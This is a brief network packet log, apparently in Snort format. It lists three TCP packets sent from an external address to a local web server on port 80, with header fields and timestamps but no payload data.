04/03-18:18:13.858754 64.252.193.160:2952 -> 192.168.1.101:80 TCP TTL:126 TOS:0x0 ID:7705 IpLen:20 DgmLen:1454 DF ***A**** Seq: 0xD26AD475 Ack: 0x93A16DBB Win: 0x4248 TcpLen: 20
04/03-18:18:13.943550 64.252.193.160:2952 -> 192.168.1.101:80 TCP TTL:126 TOS:0x0 ID:7706 IpLen:20 DgmLen:1454 DF ***A**** Seq: 0xD26AD9FB Ack: 0x93A16DBB Win: 0x4248 TcpLen: 20
04/03-18:18:14.038627 64.252.193.160:2952 -> 192.168.1.101:80 TCP TTL:126 TOS:0x0 ID:7714 IpLen:20 DgmLen:1030 DF ***AP*** Seq: 0xD26ADF81 Ack: 0x93A16DBB Win: 0x4248 TcpLen: 20